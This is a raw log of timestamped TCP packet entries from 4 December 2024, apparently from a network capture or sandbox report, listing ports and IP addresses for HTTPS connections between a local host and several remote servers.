Dec 4, 2024 12:17:00.679311037 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:17:00.679461956 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:17:00.679483891 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.679495096 CET	49737	443	192.168.2.4	172.202.163.200
Dec 4, 2024 12:17:00.679500103 CET	443	49737	172.202.163.200	192.168.2.4
Dec 4, 2024 12:17:00.690592051 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.690614939 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.690670013 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.690690041 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.690704107 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.690732956 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.729738951 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.729756117 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.729816914 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.729834080 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.729846954 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.729873896 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.855573893 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.855598927 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.855679989 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.855706930 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.855750084 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.887943029 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.887964010 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.888040066 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.888046980 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.888089895 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.916318893 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.916335106 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.916383028 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.916389942 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.916419029 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.916434050 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.933698893 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.933716059 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.933814049 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:00.933820009 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:00.933861017 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.045034885 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.045054913 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.045116901 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.045128107 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.045167923 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.062243938 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.062258005 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.062299967 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.062304974 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.062339067 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.062350988 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.077081919 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.077096939 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.077141047 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.077147007 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.077168941 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.077186108 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.089792967 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.089809895 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.089854956 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.089860916 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.089871883 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.089901924 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.104454994 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.104471922 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.104507923 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.104513884 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.104532957 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.104821920 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.108328104 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.108381987 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.108432055 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.112086058 CET	49738	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.112099886 CET	443	49738	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.166436911 CET	49739	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.166492939 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.166579008 CET	49739	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.166614056 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.166668892 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.166723013 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.166950941 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.166995049 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.167099953 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.167256117 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.167269945 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.167371988 CET	49739	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.167386055 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.167524099 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.167541027 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.167864084 CET	49742	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.167871952 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.167923927 CET	49742	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.168025970 CET	49742	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.168034077 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.168473005 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.168499947 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.168569088 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.168688059 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:01.168699980 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:01.363409042 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:01.363459110 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:01.363583088 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:01.409765005 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:01.409797907 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:02.776829958 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:02.776894093 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:02.887794971 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.888396025 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.888597012 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.891805887 CET	49739	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.891833067 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.892501116 CET	49739	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.892507076 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.893421888 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.896596909 CET	49742	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.896630049 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.897109032 CET	49742	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.897114992 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.897433043 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.897447109 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.897862911 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.897876978 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.898137093 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.898142099 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.898458004 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.898464918 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.911536932 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:02.911551952 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:02.911921978 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:02.913033009 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:02.916668892 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:02.954976082 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.957389116 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.957403898 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.957889080 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:02.957895041 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:02.963334084 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:03.323168993 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.323242903 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.323318005 CET	49739	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.323584080 CET	49739	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.323605061 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.323617935 CET	49739	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.323621988 CET	443	49739	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.324528933 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.324595928 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.324686050 CET	49742	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.325779915 CET	49742	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.325799942 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.325829029 CET	49742	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.325834990 CET	443	49742	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.329180956 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.329205990 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.329292059 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.329309940 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.329360008 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.331732988 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.331793070 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.332899094 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.334182024 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.334212065 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.334266901 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.334276915 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.336883068 CET	49745	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.336899042 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.336910009 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.336997986 CET	49745	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.337199926 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.337199926 CET	49741	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.337224960 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.337234020 CET	443	49741	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.338076115 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.338076115 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.338082075 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.338244915 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.338274956 CET	443	49740	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.339298010 CET	49745	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.339310884 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.339317083 CET	49740	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.340774059 CET	49746	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.340804100 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.341722965 CET	49747	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.341732025 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.341759920 CET	49746	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.341784000 CET	49747	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.341885090 CET	49747	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.341893911 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.342380047 CET	49746	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.342392921 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.343411922 CET	49748	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.343441963 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.345067978 CET	49748	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.345230103 CET	49748	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.345242023 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.353257895 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:03.353279114 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:03.353311062 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:03.353329897 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:03.353374958 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:03.353409052 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:03.355464935 CET	49744	443	192.168.2.4	149.154.167.99
Dec 4, 2024 12:17:03.355475903 CET	443	49744	149.154.167.99	192.168.2.4
Dec 4, 2024 12:17:03.410173893 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.410203934 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.410269022 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.410280943 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.411144972 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.411204100 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.412190914 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.412190914 CET	49743	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.412204027 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.412214041 CET	443	49743	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.416388035 CET	49749	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.416424990 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.416486025 CET	49749	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.416840076 CET	49749	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:03.416851044 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:03.866889000 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:03.866942883 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:03.867028952 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:03.867343903 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:03.867357969 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:05.084609985 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.084712982 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.085304022 CET	49747	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.085330963 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.085549116 CET	49745	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.085557938 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.085877895 CET	49747	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.085881948 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.086050034 CET	49745	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.086055040 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.145931005 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.146476984 CET	49748	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.146492958 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.146927118 CET	49748	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.146931887 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.147604942 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.147861958 CET	49746	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.147886038 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.148191929 CET	49746	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.148200989 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.221149921 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.221776009 CET	49749	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.221812010 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.222242117 CET	49749	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.222245932 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.518950939 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.519017935 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.519083977 CET	49745	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.519355059 CET	49745	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.519382954 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.519395113 CET	49745	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.519401073 CET	443	49745	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.520776033 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.520853996 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.520920992 CET	49747	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.521030903 CET	49747	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.521040916 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.521054029 CET	49747	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.521059036 CET	443	49747	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.522844076 CET	49751	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.522882938 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.522981882 CET	49751	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.523058891 CET	49752	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.523092985 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.523133993 CET	49751	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.523149014 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.523154020 CET	49752	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.523339033 CET	49752	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.523353100 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.589344978 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.589413881 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.589546919 CET	49748	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.589793921 CET	49748	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.589814901 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.589860916 CET	49748	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.589867115 CET	443	49748	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.591340065 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.591386080 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.591445923 CET	49746	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.591665030 CET	49746	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.591689110 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.591701984 CET	49746	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.591706991 CET	443	49746	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.594119072 CET	49753	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.594160080 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.594240904 CET	49753	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.595118999 CET	49754	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.595156908 CET	443	49754	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.595215082 CET	49754	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.595268011 CET	49753	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.595280886 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.595345974 CET	49754	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.595359087 CET	443	49754	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.665153980 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.665218115 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.665311098 CET	49749	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.665534019 CET	49749	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.665553093 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.665564060 CET	49749	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.665569067 CET	443	49749	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.668729067 CET	49755	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.668747902 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.668833017 CET	49755	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.669092894 CET	49755	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:05.669109106 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:05.687285900 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:05.687398911 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:05.691272974 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:05.691287041 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:05.691634893 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:05.691696882 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:05.692085028 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:05.739332914 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:06.357661009 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:06.357742071 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:06.357770920 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:06.357796907 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:06.360249996 CET	49750	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:06.360275984 CET	443	49750	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:06.362489939 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:06.362526894 CET	443	49756	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:06.362603903 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:06.362844944 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:06.362857103 CET	443	49756	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:07.241355896 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.241991043 CET	49752	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.242023945 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.242490053 CET	49752	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.242499113 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.307722092 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.308319092 CET	49751	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.308350086 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.308901072 CET	49751	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.308907986 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.310626984 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.311049938 CET	49753	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.311075926 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.311490059 CET	49753	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.311497927 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.386014938 CET	443	49754	13.107.246.63	192.168.2.4
